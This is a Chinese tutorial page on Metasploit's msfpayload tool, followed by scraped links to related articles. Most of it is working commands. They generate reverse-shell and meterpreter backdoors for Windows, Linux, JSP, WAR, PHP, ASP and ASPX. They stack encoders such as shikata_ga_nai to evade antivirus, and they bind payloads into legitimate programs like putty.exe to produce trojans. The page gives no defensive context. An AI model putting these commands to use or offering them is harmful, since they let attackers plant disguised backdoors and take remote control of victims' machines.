msf payload php,Metasploit(四)--Msfpayload命令
msfpayload即将在2015年6月18日弃用,用msfvenmon替代
msfpayload -h
msfpayload的帮助信息。
msfpayload -l | grep windows
msfpayload -l | grep linux
msfpayload -l | grep andriod
列出某个平台的pyloads
msfpayload windows/meterpreter/bind_tcp S
查看需要设置参数
msfpayload windows/meterpreter/bind_tcp O
列出所有windows/meterpreter/bind_tcp下可用的***载荷的配置项(任何***载荷都是可用配置的)。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe
创建一个metasploit的reverse_tcp***载荷,回连到LHOSTip的LPORT,将其保存为名为payload.exe的windows下可执行程序。
msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw
创建一个metasploit的reverse_tcp***载荷,回连到LHOSTip的LPORT,将其保存为名payload.raw,该文件后面的msffencode中使用。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c
创建一个metasploit的reverse_tcp***载荷,导出C格式的shellcode。
msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java
创建一个metasploit的reverse_tcp***载荷,导出成以%u编码方式的javaScript语言字符串。
msfpayload与可执行文件帮顶,如netcat
root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
msfpayload生成linux backdooroot@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.7.102 LPORT=5555 X > linux2
msfpayload生成exe backdoorroot@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 > /root/Desktop/door.exe
root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 -k -x /root/putty.exe -o /root/Desktop/puttydoor.exe
root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 10 X > shell.bin
root@bt:~#msfpayload windows/shell/reverse_tcp LHOST=10.0.0.1 LPORT=4443 EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t exe -o door.exe
msfpayload生成jsp backdooroot@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=10.1.1.1 LPORT=5555 R > door.jsp
msfpayload生成war backdoo
root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=5555 W > door.war
msfpayload生成php backdoor
root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e php/base64 -t raw -o base64php.php
msfpayload生成asp backdoorroot@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t asp -o door2.asp
msfpayload生成aspx backdoor
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t aspx -o door.aspx
目标是内网时,常用的payload选着如:root@bt:~# msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o allports.exe
root@bt:~# msfpayload windows/meterpreter/reverse_http LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o httpports.exe
msf payload php,Metasploit(四)--Msfpayload命令相关推荐
- msf payload php,msfpayload和msfencode的介绍_91Ri.org
网上说用msfpayload 生成什么注入进程什么攻击后门,后边的注入进程是吓唬人的,就是一种进程隐藏技术不理解没关系(解释一下:进程注入是指将可恶意的可执行代码注入到一个已经运行的进程一般是合法系统 ...
- MSF常用的监听模块命令
msfpayload 命令 帮助 msfpayload -h 列出所有可用的***载荷 msfpayload windows/meterpreter/bind_tcp O 列出所有windows/me ...
- RCE、exp、Exploit、Exploit Pack、exp-gui、Payload、MetaSploit都是啥
对于走在安全路上的小菜来说,这几个exp.Exploit.Exploit Pack.exp-gui.Payload.MetaSploit名词着实把人转的不轻,下面给大家解释下: RCE,remote ...
- windows opensshd 连接就close_基于Windows白名单执行Payload上线Metasploit 渗透红队笔记...
渗透攻击红队 一个专注于红队攻击的公众号 大家好,这里是 渗透攻击红队 的第 17 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深), 不出意外每天一更 基于白名单绕过 测试环境 攻击机 ...
- zookeeper命令行(zkCli.shzkServer.sh)使用及四字命令
zookeeper提供了很多方便的功能,方便我们查看服务器的状态,增加,修改,删除数据(入口是zkServer.sh和zkCli.sh). 还提供了一系列四字命令,方便我们跟服务器进行各种交互,来确认 ...
- kinux查日志_Linux实时查看日志的四种命令详解
原标题:Linux实时查看日志的四种命令详解 如何在Linux中实时查看日志文件的内容?那么有很多实用程序可以帮助用户在文件更改或不断更新时输出文件的内容.在Linux中实时显示文件内容的常用命令是t ...
- zookeeper 四字命令的使用
Linux中的命令NetCat有"瑞士军刀"的美誉.我们可以通过nc命令查看Zookeeper的一行属性数据.在Zookeeper中有很多四字命令,汇总如下: 序号 使用命令 输出 ...
- zookeeper的acl权限控制_zookeeper权限acl与四字命令
权限acl介绍,acl的构成与id acl是Access control lists 的缩写,也就是权限控制列表: 针对节点可以设置相关读写等权限,目的是为了保障数据安全性 权限permissions ...
- 开启 Zookeeper 四字命令(is not executed because it is not in the whitelist)
有时候我们需要使用四字命令查看 ZK 的一些信息,如果没有配置开启,救会出现这样的异常: ➜ bin echo mntr | nc localhost 2181 mntr is not execute ...
最新文章
- SVN可以拉项目但是提交时提示没有权限
- Kubernetes之路 1 - Java应用资源限制的迷思
- 总结JavaScript(Iframe、window.open、window.showModalDialog)父窗口与子窗口之间的操作
- iphone固件降级_iPhone无法开机怎么办?三种快速维修方法
- php获取模型错误,php – 解析错误,期望activecollab模型类中出现“T_PAAMAYIM_NEKUDOTAYIM”错误...
- 风控建模:催收评分卡(四)--变量整理除了跟数据获取相关外还跟什么有关系?
- python中PIL.Image,OpenCV,Numpy图像格式相互转换
- 总结命令----tar
- rehat 出现GDB debuginfo-install 问题处理
- USB 重定向库usbredir的移植到Android下使用的方法总结
- 电气防火限流式保护器及其过电流故障检测方法
- [密码学]利用docker安装与使用sagemath
- Android Studio 必备技巧:TODO 用法及自定义 TODO
- ADB命令使用大全及使用原理
- 观点 | ​苏宁传统零售业“数字化转型”经验分享
- 台湾榜首iPhone游戏创作者谈开发成败
- 今天面了个腾讯拿30k出来的,真是小母牛按门铃,牛逼到家了
- CSS基本语法_html-css
- Windows 10 1909(19H2) 精简纯净版PE系统
- 【Android 系统开发】 编译 Android文件系统 u-boot 内核 并烧写到 OK-6410A 开发板上
热门文章
- RAML用户应遵循的C#与Web API代码生成模式
- Java 数字相关操作通用类 NumberUtils.java
- Can't create directory 'E:\Repositories\***\db\transactions\138-41.txn':
- Android Studio之编译提示\app\src\main\res\values\colors.xml:1:1 Error:前言有不允许的内容
- linux shell之得到当前路径下的目录
- IOS之学习笔记六(可变形参)
- Android之用命令uninstall卸载apk和用 -i 过滤日志忽略大小写
- 这种动作片还需要汽车特效?
- 理科生浪漫起来,谁都顶不住!
- 程序员没有女朋友的原因,我终于找到了!